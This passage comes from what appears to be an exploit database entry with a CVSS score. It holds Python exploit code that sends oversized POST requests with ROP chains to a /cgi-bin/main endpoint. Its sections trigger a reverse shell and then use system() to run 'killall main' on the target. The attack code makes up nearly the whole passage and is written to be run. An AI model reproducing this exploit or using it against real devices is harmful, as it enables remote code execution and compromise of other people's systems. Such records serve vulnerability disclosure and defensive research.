+= struct.pack(\"I\", 0xB1E8B434 ) # ebx\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\nmsg += \"A\" * 100\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close\n\ntime.sleep(1)\n\n###################################################################\n#\n# Trigger reverse shell\t\n# \n\t\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsend_cmd = 0x807ED88\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\nret = 0x804CE65\n\n#stack pivot\nstack_pivot = 0x8049488\nmsg = \"button=\" + \"A\" * 9756\n\nmsg += \"B\" * 28\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\nmsg += struct.pack(\"I\", ret ) * (71/4)\n\nmsg += struct.pack(\"I\", send_cmd )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60]\nmsg += struct.pack(\"I\", some_str ) # buffer\nmsg += struct.pack(\"I\", 0xffffffff ) # count\nmsg += \"E\" * 120\n\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\nmsg += struct.pack(\"I\", stack_pivot ) 
# mov esp, ebp ; ret\nmsg += \"A\" * 100\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n\ntime.sleep(1)\n\n\nprint \"[+] cleaning up\"\n###################################################################\n#\n# Kill all mains that are hung-up\n#\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\n\ncommand = 'killall main'\n\nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", some_str )\nmsg += command + \"\\x00\"\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n\nprint \"[+] enjoy\"", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}